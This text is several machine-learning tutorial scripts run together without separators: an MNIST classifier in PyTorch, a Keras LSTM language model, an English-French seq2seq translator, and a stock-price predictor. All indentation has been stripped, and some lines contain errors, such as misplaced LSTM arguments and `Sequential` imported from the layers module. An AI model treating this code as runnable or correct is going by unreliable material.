def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = self.fc4(x)
return F.log_softmax(x, dim=1)
if __name__ == "__main__":
training_set = datasets.MNIST("", train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
test_set = datasets.MNIST("", train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
# load the dataset
train = torch.utils.data.DataLoader(training_set, batch_size=batch_size, shuffle=True)
test = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False)
# construct the model
net = Net()
# specify the loss and optimizer
loss = nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters(), lr=0.001)
# training the model
for epoch in range(epochs):
for data in train:
# data is the batch of data now
# X are the features, y are labels
X, y = data
net.zero_grad() # set gradients to 0 before loss calculation
output = net(X.view(-1, 28*28)) # feed data to the network
loss = F.nll_loss(output, y) # calculating the negative log likelihood
loss.backward() # back propagation
optimizer.step() # attempt to optimize weights to account for loss/gradients
print(loss)
correct = 0
total = 0
with torch.no_grad():
for data in test:
X, y = data
output = net(X.view(-1, 28*28))
for index, i in enumerate(output):
if torch.argmax(i) == y[index]:
correct += 1
total += 1
print("Accuracy:", round(correct / total, 3))
# testing
print(torch.argmax(net(X.view(-1, 28*28))[0]))
plt.imshow(X[0].view(28, 28))
plt.show()
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed
from keras.layers import Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
if bidirectional:
model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=True)))
else:
model.add(cell(units, return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(TimeDistributed(Dense(input_dim, activation="softmax")))
return model
from utils import UNK, text_to_sequence, sequence_to_text
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM
from models import rnn_model
from scipy.ndimage.interpolation import shift
import numpy as np
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=6,
inter_op_parallelism_threads=6,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
INPUT_DIM = 50
test_text = ""
test_text += """college or good clerk at university has not pleasant days or used not to have them half a century ago but his position was recognized and the misery was measured can we just make something that is useful for making this happen especially when they are just doing it by"""
encoded = np.expand_dims(np.array(text_to_sequence(test_text)), axis=0)
encoded = encoded.reshape((-1, encoded.shape[0], encoded.shape[1]))
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.load_weights("results/lm_rnn_v2_6400548.3.h5")
# for i in range(10):
# predicted_word_int = model.predict_classes(encoded)[0]
# print(predicted_word_int, end=',')
# word = sequence_to_text(predicted_word_int)
# encoded = shift(encoded, -1, cval=predicted_word_int)
# print(word, end=' ')
print("Fed:")
print(encoded)
print("Result: predict")
print(model.predict(encoded)[0])
print("Result: predict_proba")
print(model.predict_proba(encoded)[0])
print("Result: predict_classes")
print(model.predict_classes(encoded)[0])
print(sequence_to_text(model.predict_classes(encoded)[0]))
print()
from models import rnn_model
from utils import sequence_to_text, text_to_sequence, get_batches, get_data, get_text, vocab
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
import numpy as np
import os
INPUT_DIM = 50
# OUTPUT_DIM = len(vocab)
BATCH_SIZE = 128
# get data
text = get_text("data")
encoded = np.array(text_to_sequence(text))
print(len(encoded))
# X, y = get_data(encoded, INPUT_DIM, 1)
# del text, encoded
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.summary()
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/lm_rnn_v2_{loss:.1f}.h5", verbose=1)
steps_per_epoch = (len(encoded) // 100) // BATCH_SIZE
model.fit_generator(get_batches(encoded, BATCH_SIZE, INPUT_DIM),
epochs=100,
callbacks=[checkpointer],
verbose=1,
steps_per_epoch=steps_per_epoch)
model.save("results/lm_rnn_v2_final.h5")
import numpy as np
import os
import tqdm
import inflect
from string import punctuation, whitespace
from word_forms.word_forms import get_word_forms
p = inflect.engine()
UNK = "<unk>"
vocab = set()
add = vocab.add
# add unk
add(UNK)
with open("data/vocab1.txt") as f:
for line in f:
add(line.strip())
vocab = sorted(vocab)
word2int = {w: i for i, w in enumerate(vocab)}
int2word = {i: w for i, w in enumerate(vocab)}
def update_vocab(word):
global vocab
global word2int
global int2word
vocab.add(word)
next_int = max(int2word) + 1
word2int[word] = next_int
int2word[next_int] = word
def save_vocab(_vocab):
with open("vocab1.txt", "w") as f:
for w in sorted(_vocab):
print(w, file=f)
def text_to_sequence(text):
return [ word2int[word] for word in text.split() ]
def sequence_to_text(seq):
return ' '.join([ int2word[i] for i in seq ])
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
def get_data(arr, n_seq, look_forward):
n_samples = len(arr) // n_seq
X = np.zeros((n_seq, n_samples))
Y = np.zeros((n_seq, n_samples))
for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
x = arr[i:i+n_seq]
y = arr[i+look_forward:i+n_seq+look_forward]
if len(x) != n_seq or len(y) != n_seq:
break
X[:, index] = x
Y[:, index] = y
return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_text(path, files=["carroll-alice.txt", "text.txt", "text8.txt"]):
global vocab
global word2int
global int2word
text = ""
file = files[0]
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file, encoding="utf8") as f:
text += f.read().lower()
punc = set(punctuation)
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
for ws in whitespace:
text = text.replace(ws, " ")
text = text.split()
co = 0
vocab_set = set(vocab)
for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# convert digits to words
# (i.e '7' to 'seven')
if text[i].isdigit():
text[i] = p.number_to_words(text[i])
# compare_nouns
# compare_adjs
# compare_verbs
if text[i] not in vocab_set:
text[i] = UNK
co += 1
# update vocab, intersection of words
print("vocab length:", len(vocab))
vocab = vocab_set & set(text)
print("vocab length after update:", len(vocab))
save_vocab(vocab)
print("Number of unks:", co)
return ' '.join(text)
from train import create_model, get_data, split_data, LSTM_UNITS, np, to_categorical, Tokenizer, pad_sequences, pickle
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def predict_sequence(enc, dec, source, n_steps, docoder_num_tokens):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
target_seq = np.zeros((1, 1, n_steps))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
target_seq = np.zeros((1, 1, n_steps))
target_seq[0, 0] = to_categorical(sampled_token_index, num_classes=n_steps)
return np.array(output)
def logits_to_text(logits, index_to_words):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return ' '.join([index_to_words[prediction] for prediction in logits])
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
X_tk = pickle.load(open("X_tk.pickle", "rb"))
y_tk = pickle.load(open("y_tk.pickle", "rb"))
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
model.load_weights("results/eng_fra_v1_17568.086.h5")
while True:
text = input("> ")
tokenized = np.array(tokenize([text], tokenizer=X_tk)[0])
print(tokenized.shape)
X = pad_sequences(tokenized, maxlen=source_sequence_length, padding="post")
X = X.reshape((1, 1, X.shape[-1]))
print(X.shape)
# X = to_categorical(X, num_classes=len(X_tk.word_index) + 1)
print(X.shape)
sequence = predict_sequence(enc, dec, X, target_sequence_length, source_sequence_length)
result = logits_to_text(sequence, y_tk.index_word)
print(result)
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, LSTM, GRU, Dense, Embedding, Activation, Dropout, Sequential, RepeatVector
from tensorflow.keras.layers import TimeDistributed
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical, plot_model
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
# hyper parameters
BATCH_SIZE = 32
EPOCHS = 10
LSTM_UNITS = 128
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS), input_shape=input_shape[1:])
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS), return_sequences=True)
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def create_model(num_encoder_tokens, num_decoder_tokens, latent_dim):
# define an input sequence
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
# define the encoder output
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
encoder_states = [state_h, state_c]
# encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# set up the decoder now
decoder_inputs = Input(shape=(None, num_decoder_tokens))
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_state_inputs = [decoder_state_input_h, decoder_state_input_c]
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
decoder_states = [state_h, state_c]
decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def get_batches(X, y, X_tk, y_tk, source_sequence_length, target_sequence_length, batch_size=BATCH_SIZE):
# get total number of words in X
num_encoder_tokens = len(X_tk.word_index) + 1
# get max number of words in all sentences in y
num_decoder_tokens = len(y_tk.word_index) + 1
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# redefine batch size
# it may differ (in last batch of dataset)
batch_size = encoder_input_data.shape[0]
# one-hot everything
# decoder_target_data = np.zeros((batch_size, num_decoder_tokens, target_sequence_length), dtype=np.uint8)
# encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens), dtype=np.uint8)
# decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens), dtype=np.uint8)
encoder_data = np.expand_dims(encoder_input_data, axis=1)
decoder_data = np.expand_dims(decoder_input_data, axis=1)
# for i, sequence in enumerate(decoder_input_data):
# for t, word_index in enumerate(sequence):
# # skip the first
# if t > 0:
# decoder_target_data[i, t-1, word_index] = 1
# decoder_data[i, t, word_index] = 1
# for i, sequence in enumerate(encoder_input_data):
# for t, word_index in enumerate(sequence):
# encoder_data[i, t, word_index] = 1
yield ([encoder_data, decoder_data], decoder_input_data)
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
output = f"{output} <eos>"
output_sentence_input = f"<sos> {output}"
X.append(input)
y.append(output)
# tokenize data
X_tk = Tokenizer()
X_tk.fit_on_texts(X)
X = X_tk.texts_to_sequences(X)
y_tk = Tokenizer()
y_tk.fit_on_texts(y)
y = y_tk.texts_to_sequences(y)
# define the max sequence length for X
source_sequence_length = max(len(x) for x in X)
# define the max sequence length for y
target_sequence_length = max(len(y_) for y_ in y)
# padding sequences
X = pad_sequences(X, maxlen=source_sequence_length, padding="post")
y = pad_sequences(y, maxlen=target_sequence_length, padding="post")
return X, y, X_tk, y_tk, source_sequence_length, target_sequence_length
def shuffle_data(X, y):
"""
Shuffles X & y and preserving their pair order
"""
state = np.random.get_state()
np.random.shuffle(X)
np.random.set_state(state)
np.random.shuffle(y)
return X, y
def split_data(X, y, train_split_rate=0.2):
# shuffle first
X, y = shuffle_data(X, y)
training_samples = round(len(X) * train_split_rate)
return X[:training_samples], y[:training_samples], X[training_samples:], y[training_samples:]
if __name__ == "__main__":
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
# save tokenizers
pickle.dump(X_tk, open("X_tk.pickle", "wb"))
pickle.dump(y_tk, open("y_tk.pickle", "wb"))
# shuffle & split data
X_train, y_train, X_test, y_test = split_data(X, y)
# construct the models
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
plot_model(model, to_file="model.png")
plot_model(enc, to_file="enc.png")
plot_model(dec, to_file="dec.png")
model.summary()
model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/eng_fra_v1_{val_loss:.3f}.h5", save_best_only=True, verbose=2)
# train the model
model.fit_generator(get_batches(X_train, y_train, X_tk, y_tk, source_sequence_length, target_sequence_length),
validation_data=get_batches(X_test, y_test, X_tk, y_tk, source_sequence_length, target_sequence_length),
epochs=EPOCHS, steps_per_epoch=(len(X_train) // BATCH_SIZE),
validation_steps=(len(X_test) // BATCH_SIZE),
callbacks=[checkpointer])
print("[+] Model trained.")
model.save("results/eng_fra_v1.h5")
print("[+] Model saved.")
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import GRU, Input, Dense, TimeDistributed, Activation, RepeatVector, Bidirectional, Flatten
from tensorflow.keras.layers import Dropout, LSTM
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import sparse_categorical_crossentropy
import collections
import numpy as np
LSTM_UNITS = 128
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
X.append(input)
y.append(output)
return X, y
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS, return_sequences=True))
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def tokenize(x):
"""
Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)
"""
# TODO: Implement
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""
Pad x
:param x: List of sequences.
:param length: Length to pad the sequence to. If None, use length of longest sequence in x.
:return: Padded numpy array of sequences
"""
# TODO: Implement
sequences = pad_sequences(x, maxlen=length, padding='post')
return sequences
def preprocess(x, y):
"""
Preprocess x and y
:param x: Feature List of sentences
:param y: Label List of sentences
:return: Tuple of (Preprocessed x, Preprocessed y, x tokenizer, y tokenizer)
"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x = pad(preprocess_x)
preprocess_y = pad(preprocess_y)
# Keras's sparse_categorical_crossentropy function requires the labels to be in 3 dimensions
preprocess_y = preprocess_y.reshape(*preprocess_y.shape, 1)
return preprocess_x, preprocess_y, x_tk, y_tk
def logits_to_text(logits, tokenizer):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
index_to_words = {id: word for word, id in tokenizer.word_index.items()}
index_to_words[0] = '<PAD>'
return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
if __name__ == "__main__":
X, y = get_data("ara.txt")
english_words = [word for sentence in X for word in sentence.split()]
french_words = [word for sentence in y for word in sentence.split()]
english_words_counter = collections.Counter(english_words)
french_words_counter = collections.Counter(french_words)
print('{} English words.'.format(len(english_words)))
print('{} unique English words.'.format(len(english_words_counter)))
print('10 Most common words in the English dataset:')
print('"' + '" "'.join(list(zip(*english_words_counter.most_common(10)))[0]) + '"')
print()
print('{} French words.'.format(len(french_words)))
print('{} unique French words.'.format(len(french_words_counter)))
print('10 Most common words in the French dataset:')
print('"' + '" "'.join(list(zip(*french_words_counter.most_common(10)))[0]) + '"')
# Tokenize Example output
text_sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
text_tokenized, text_tokenizer = tokenize(text_sentences)
print(text_tokenizer.word_index)
print()
for sample_i, (sent, token_sent) in enumerate(zip(text_sentences, text_tokenized)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(sent))
print(' Output: {}'.format(token_sent))
# Pad Tokenized output
test_pad = pad(text_tokenized)
for sample_i, (token_sent, pad_sent) in enumerate(zip(text_tokenized, test_pad)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(np.array(token_sent)))
print(' Output: {}'.format(pad_sent))
preproc_english_sentences, preproc_french_sentences, english_tokenizer, french_tokenizer =\
preprocess(X, y)
max_english_sequence_length = preproc_english_sentences.shape[1]
max_french_sequence_length = preproc_french_sentences.shape[1]
english_vocab_size = len(english_tokenizer.word_index)
french_vocab_size = len(french_tokenizer.word_index)
print('Data Preprocessed')
print("Max English sentence length:", max_english_sequence_length)
print("Max French sentence length:", max_french_sequence_length)
print("English vocabulary size:", english_vocab_size)
print("French vocabulary size:", french_vocab_size)
tmp_x = pad(preproc_english_sentences, preproc_french_sentences.shape[1])
tmp_x = tmp_x.reshape((-1, preproc_french_sentences.shape[-2], 1))
print("tmp_x.shape:", tmp_x.shape)
print("preproc_french_sentences.shape:", preproc_french_sentences.shape)
# Train the neural network
# increased passed index length by 1 to avoid index error
encdec_rnn_model = create_encdec_model(
tmp_x.shape,
preproc_french_sentences.shape[1],
len(english_tokenizer.word_index)+1,
len(french_tokenizer.word_index)+1)
print(encdec_rnn_model.summary())
# reduced batch size
encdec_rnn_model.fit(tmp_x, preproc_french_sentences, batch_size=256, epochs=3, validation_split=0.2)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[1].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
print("Original text and translation:")
print(X[1])
print(y[1])
# OPTIONAL: Train and Print prediction(s)
print("="*50)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[10].reshape((1, tmp_x[1].shape[0], 1, ))[0]), french_tokenizer))
print("Original text and translation:")
print(X[10])
print(y[10])
# OPTIONAL: Train and Print prediction(s)
from tensorflow.keras.layers import LSTM, Dense, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.metrics import mean_absolute_error, mean_squared_error, accuracy_score
import os
import time
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from utils import classify, shift, create_model, load_data
class PricePrediction:
"""A Class utility to train and predict price of stocks/cryptocurrencies/trades
using keras model"""
def __init__(self, ticker_name, **kwargs):
"""
:param ticker_name (str): ticker name, e.g. aapl, nflx, etc.
:param n_steps (int): sequence length used to predict, default is 60
:param price_column (str): the name of column that contains price predicted, default is 'adjclose'
:param feature_columns (list): a list of feature column names used to train the model,
default is ['adjclose', 'volume', 'open', 'high', 'low']
:param target_column (str): target column name, default is 'future'
:param lookup_step (int): the future lookup step to predict, default is 1 (e.g. next day)
:param shuffle (bool): whether to shuffle the dataset, default is True
:param verbose (int): verbosity level, default is 1
==========================================
Model parameters
:param n_layers (int): number of recurrent neural network layers, default is 3
:param cell (keras.layers.RNN): RNN cell used to train keras model, default is LSTM
:param units (int): number of units of cell, default is 256
:param dropout (float): dropout rate ( from 0 to 1 ), default is 0.3
==========================================
Training parameters
:param batch_size (int): number of samples per gradient update, default is 64
:param epochs (int): number of epochs, default is 100
:param optimizer (str, keras.optimizers.Optimizer): optimizer used to train, default is 'adam'
:param loss (str, function): loss function used to minimize during training,
default is 'mae'
:param test_size (float): test size ratio from 0 to 1, default is 0.15
"""
self.ticker_name = ticker_name
self.n_steps = kwargs.get("n_steps", 60)
self.price_column = kwargs.get("price_column", 'adjclose')
self.feature_columns = kwargs.get("feature_columns", ['adjclose', 'volume', 'open', 'high', 'low'])
self.target_column = kwargs.get("target_column", "future")
self.lookup_step = kwargs.get("lookup_step", 1)
self.shuffle = kwargs.get("shuffle", True)
self.verbose = kwargs.get("verbose", 1)
self.n_layers = kwargs.get("n_layers", 3)
self.cell = kwargs.get("cell", LSTM)
self.units = kwargs.get("units", 256)
self.dropout = kwargs.get("dropout", 0.3)
self.batch_size = kwargs.get("batch_size", 64)
self.epochs = kwargs.get("epochs", 100)
self.optimizer = kwargs.get("optimizer", "adam")
self.loss = kwargs.get("loss", "mae")
self.test_size = kwargs.get("test_size", 0.15)
# create unique model name
self._update_model_name()
# runtime attributes
self.model_trained = False
self.data_loaded = False
self.model_created = False
# test price values
self.test_prices = None
# predicted price values for the test set
self.y_pred = None
# prices converted to buy/sell classes
self.classified_y_true = None
# predicted prices converted to buy/sell classes
self.classified_y_pred = None
# most recent price
self.last_price = None
# make folders if does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
def create_model(self):
"""Construct and compile the keras model"""
self.model = create_model(input_length=self.n_steps,
units=self.units,
cell=self.cell,
dropout=self.dropout,
n_layers=self.n_layers,
loss=self.loss,
optimizer=self.optimizer)
self.model_created = True
if self.verbose > 0:
print("[+] Model created")
def train(self, override=False):
"""Train the keras model using self.checkpointer and self.tensorboard as keras callbacks.
If model created already trained, this method will load the weights instead of training from scratch.
Note that this method will create the model and load data if not called before."""
# if model isn't created yet, create it
if not self.model_created:
self.create_model()
# if data isn't loaded yet, load it
if not self.data_loaded:
self.load_data()
# if the model already exists and trained, just load the weights and return
# but if override is True, then just skip loading weights
if not override:
model_name = self._model_exists()
if model_name:
self.model.load_weights(model_name)
self.model_trained = True
if self.verbose > 0:
print("[*] Model weights loaded")
return
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
model_filename = self._get_model_filename()
self.checkpointer = ModelCheckpoint(model_filename, save_best_only=True, verbose=1)
self.tensorboard = TensorBoard(log_dir=f"logs\{self.model_name}")
self.history = self.model.fit(self.X_train, self.y_train,
batch_size=self.batch_size,
epochs=self.epochs,
validation_data=(self.X_test, self.y_test),
callbacks=[self.checkpointer, self.tensorboard],
verbose=1)
self.model_trained = True
if self.verbose > 0:
print("[+] Model trained")
def predict(self, classify=False):
"""Predicts next price for the step self.lookup_step.
when classify is True, returns 0 for sell and 1 for buy"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
# reshape to fit the model input
last_sequence = self.last_sequence.reshape((self.last_sequence.shape[1], self.last_sequence.shape[0]))
# expand dimension
last_sequence = np.expand_dims(last_sequence, axis=0)
predicted_price = self.column_scaler[self.price_column].inverse_transform(self.model.predict(last_sequence))[0][0]
if classify:
last_price = self.get_last_price()
return 1 if last_price < predicted_price else 0
else:
return predicted_price
def load_data(self):
"""Loads and preprocess data"""
filename, exists = self._df_exists()
if exists:
# if the updated dataframe already exists in disk, load it
self.ticker = pd.read_csv(filename)
ticker = self.ticker
if self.verbose > 0:
print("[*] Dataframe loaded from disk")
else:
ticker = self.ticker_name
result = load_data(ticker,n_steps=self.n_steps, lookup_step=self.lookup_step,
shuffle=self.shuffle, feature_columns=self.feature_columns,
price_column=self.price_column, test_size=self.test_size)
# extract data
self.df = result['df']
self.X_train = result['X_train']
self.X_test = result['X_test']
self.y_train = result['y_train']
self.y_test = result['y_test']
self.column_scaler = result['column_scaler']
self.last_sequence = result['last_sequence']
if self.shuffle:
self.unshuffled_X_test = result['unshuffled_X_test']
self.unshuffled_y_test = result['unshuffled_y_test']
else:
self.unshuffled_X_test = self.X_test
self.unshuffled_y_test = self.y_test
self.original_X_test = self.unshuffled_X_test.reshape((self.unshuffled_X_test.shape[0], self.unshuffled_X_test.shape[2], -1))
self.data_loaded = True
if self.verbose > 0:
print("[+] Data loaded")
# save the dataframe to disk
self.save_data()
def get_last_price(self):
"""Returns the last price ( i.e the most recent price )"""
if not self.last_price:
self.last_price = float(self.df[self.price_column].tail(1))
return self.last_price
def get_test_prices(self):
"""Returns test prices. Note that this function won't return the whole sequences,
instead, it'll return only the last value of each sequence"""
if self.test_prices is None:
current = np.squeeze(self.column_scaler[self.price_column].inverse_transform([[ v[-1][0] for v in self.original_X_test ]]))
future = np.squeeze(self.column_scaler[self.price_column].inverse_transform(np.expand_dims(self.unshuffled_y_test, axis=0)))
self.test_prices = np.array(list(current) + [future[-1]])
return self.test_prices
def get_y_pred(self):
"""Get predicted values of the testing set of sequences ( y_pred )"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
if self.y_pred is None:
self.y_pred = np.squeeze(self.column_scaler[self.price_column].inverse_transform(self.model.predict(self.unshuffled_X_test)))
return self.y_pred
def get_y_true(self):
"""Returns original y testing values ( y_true )"""
test_prices = self.get_test_prices()
return test_prices[1:]
def _get_shifted_y_true(self):
"""Returns original y testing values shifted by -1.
This function is useful for converting to a classification problem"""
test_prices = self.get_test_prices()
return test_prices[:-1]
def _calc_classified_prices(self):
"""Convert regression predictions to a classification predictions ( buy or sell )
and set results to self.classified_y_pred for predictions and self.classified_y_true
for true prices"""
if self.classified_y_true is None or self.classified_y_pred is None:
current_prices = self._get_shifted_y_true()
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
self.classified_y_true = list(map(classify, current_prices, future_prices))
self.classified_y_pred = list(map(classify, current_prices, predicted_prices))
# some metrics
def get_MAE(self):
"""Calculates the Mean-Absolute-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_absolute_error(y_true, y_pred)
def get_MSE(self):
"""Calculates the Mean-Squared-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_squared_error(y_true, y_pred)
def get_accuracy(self):
"""Calculates the accuracy after adding classification approach (buy/sell)"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
self._calc_classified_prices()
return accuracy_score(self.classified_y_true, self.classified_y_pred)
def plot_test_set(self):
"""Plots test data"""
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
plt.plot(future_prices, c='b')
plt.plot(predicted_prices, c='r')
plt.xlabel("Days")
plt.ylabel("Price")
plt.legend(["Actual Price", "Predicted Price"])
plt.show()
def save_data(self):
"""Saves the updated dataframe if it does not exist"""
filename, exists = self._df_exists()
if not exists:
self.df.to_csv(filename)
if self.verbose > 0:
print("[+] Dataframe saved")
def _update_model_name(self):
stock = self.ticker_name.replace(" ", "_")
feature_columns_str = ''.join([ c[0] for c in self.feature_columns ])
time_now = time.strftime("%Y-%m-%d")
self.model_name = f"{time_now}_{stock}-{feature_columns_str}-loss-{self.loss}-{self.cell.__name__}-seq-{self.n_steps}-step-{self.lookup_step}-layers-{self.n_layers}-units-{self.units}"
def _get_df_name(self):
"""Returns the updated dataframe name"""
time_now = time.strftime("%Y-%m-%d")
return f"data/{self.ticker_name}_{time_now}.csv"
def _df_exists(self):
"""Check if the updated dataframe exists in disk, returns a tuple contains (filename, file_exists)"""
filename = self._get_df_name()
return filename, os.path.isfile(filename)
def _get_model_filename(self):
"""Returns the relative path of this model name with h5 extension"""
return f"results/{self.model_name}.h5"
def _model_exists(self):
"""Checks if model already exists in disk, returns the filename,
returns None otherwise"""
filename = self._get_model_filename()
return filename if os.path.isfile(filename) else None
# uncomment below to use CPU instead of GPU
# import os
